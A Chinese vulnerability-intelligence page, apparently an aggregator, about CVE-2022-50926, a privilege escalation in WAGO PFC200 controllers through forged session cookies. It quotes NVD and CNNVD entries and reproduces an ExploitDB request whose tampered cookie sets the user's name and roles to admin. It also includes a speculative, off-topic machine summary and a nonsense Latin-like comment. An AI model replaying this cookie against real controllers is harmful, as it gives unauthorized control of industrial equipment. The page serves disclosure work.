支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:736

73.6%
一、 漏洞 CVE-2022-50926 基础信息
漏洞信息
                                        # WAGO PFC200 2ETH RS 权限提升漏洞

N/A
                                        
神龙判断

是否为 Web 类漏洞: 未知

判断理由:

N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation
来源:美国国家漏洞数据库 NVD
漏洞描述信息
WAGO 750-8212 PFC200 G2 2ETH RS firmware contains a privilege escalation vulnerability that allows attackers to manipulate user session cookies. Attackers can modify the cookie's 'name' and 'roles' parameters to elevate from ordinary user to administrative privileges without authentication.
来源:美国国家漏洞数据库 NVD
CVSS信息
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
来源:美国国家漏洞数据库 NVD
漏洞类别
在信任Cookie未进行验证与完整性检查
来源:美国国家漏洞数据库 NVD
漏洞标题
WAGO 安全漏洞
来源:中国国家信息安全漏洞库 CNNVD
漏洞描述信息
WAGO是德国万可(WAGO)公司的一款750-88x系列可编程逻辑控制器。该设备专门为在工业环境下应用而设计的数字运算操作电子系统。 WAGO存在安全漏洞,该漏洞源于可操纵用户会话Cookie,可能导致权限提升。
来源:中国国家信息安全漏洞库 CNNVD
CVSS信息
N/A
来源:中国国家信息安全漏洞库 CNNVD
漏洞类别
其他
来源:中国国家信息安全漏洞库 CNNVD
二、漏洞 CVE-2022-50926 的公开POC
#POC 描述源链接神龙链接
三、漏洞 CVE-2022-50926 的情报信息
  • 标题: WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation - Hardware remote Exploit -- 🔗来源链接

    标签:exploit

    神龙速读:
                                            - **Exploit Title**: WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation
    - **EDB-ID**: 50793
    - **CVE**: N/A
    - **Author**: MOMEN ELDAAWAHLY
    - **Type**: REMOTE
    - **Platform**: HARDWARE
    - **Date**: 2022-02-28
    - **Firmware Version**: 03.05.10(17)
    - **Tested on**: PopOS! [Linux](Firefox)
    - **Vulnerable Request**:
        ```plaintext
        GET /wbm/ HTTP/1.1
        Host: 192.168.1.1
        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
        Accept: */*
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        DNT: 1
        Connection: close
        Referer: http://192.168.1.1/wbm/
        Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22admin%22%22roles%22:[%22admin%22%22admin%22]%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfwtLEbVFL6b71ouu1yk1WqKTsdFo52yavqrTF86f%22%2C%22}
        ```
    - **Advisory/Source**: Link
                                            
    WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation - Hardware remote Exploit
  • 标题: WAGO NL | Uw partner voor automatisering en verbindingstechniek -- 🔗来源链接

    标签:product

    神龙速读:
                                            从给出的WAGO的网页截图中,我们可以观察到这其实是一个企业宣传和产品介绍页面,并没有直接展示任何关于漏洞的信息。然而,如果我们要从网络安全和信息保护的角度分析,可以推测和建议以下与潜在安全漏洞相关的信息和注意事项:
    
    - **外部链接的安全性**:页面上有指向外部网站的链接,如UReason公司的网站链接(ureason.com/wago.com)。需要确保这些链接指向安全、信誉良好的网站,以防止钓鱼攻击或恶意软件传播。
    
    - **表单和数据收集的安全性**:页面上有收集用户信息的表单,如联系信息和新闻通讯订阅。应确保这些表单采用安全的HTTPS协议传输数据,并遵循GDPR等数据保护法规,保护用户隐私。
    
    - **软件和固件的更新**:在“Downloads”部分,可能提供软件和固件的下载。应定期更新以修补可能存在的安全漏洞,并鼓励用户及时安装更新。
    
    - **社交媒体链接**:页面底部列出了WAGO在各大社交媒体平台的链接。需注意这些链接的安全性,防止不法分子利用社交媒体进行网络攻击。
    
    - **内部网络安全管理**:作为一家涉及工业自动化和电子技术的公司,WAGO应具备严格的内部网络安全管理措施,保护公司机密信息和客户数据安全。
    
    不过,以上分析是基于一般网络安全知识的推测。要获取此页面特定的漏洞信息,需要进行专业的网络安全测试和审计。
                                            
    WAGO NL | Uw partner voor automatisering en verbindingstechniek
  • 标题: WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation | Advisories | VulnCheck -- 🔗来源链接

    标签:third-party-advisory

    神龙速读:
                                            ```md
    ### 关键漏洞信息
    
    #### 漏洞名称
    WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation
    
    #### 严重性
    HIGH
    
    #### 发布日期
    January 13, 2026
    
    #### 影响范围
    - WAGO 750-8212 PFC200 Firmware version 03.05.10(17)
    
    #### 漏洞类型
    CVE-2022-50926
    
    #### 漏洞描述
    WAGO 750-8212 PFC200 G2 2ETH RS firmware contains a privilege escalation vulnerability that allows attackers to manipulate user session cookies. Attackers can modify the cookie's 'name' and 'roles' parameters to elevate from ordinary user to administrative privileges without authentication.
    
    #### CVSS评分
    7.5/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    
    #### 漏洞细节
    - [ExploitDB-50793](https://www.exploit-db.com/exploits/50793)
    - [Official Vendor Homepage](#)
    
    #### 举报者
    Momen Eldawakhly (Cyber Guy) at Cypro AB
    ```
                                            
    WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation | Advisories | VulnCheck
  • https://nvd.nist.gov/vuln/detail/CVE-2022-50926
四、漏洞 CVE-2022-50926 的评论
匿名用户
2026-01-15 06:08:46

Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.


发表评论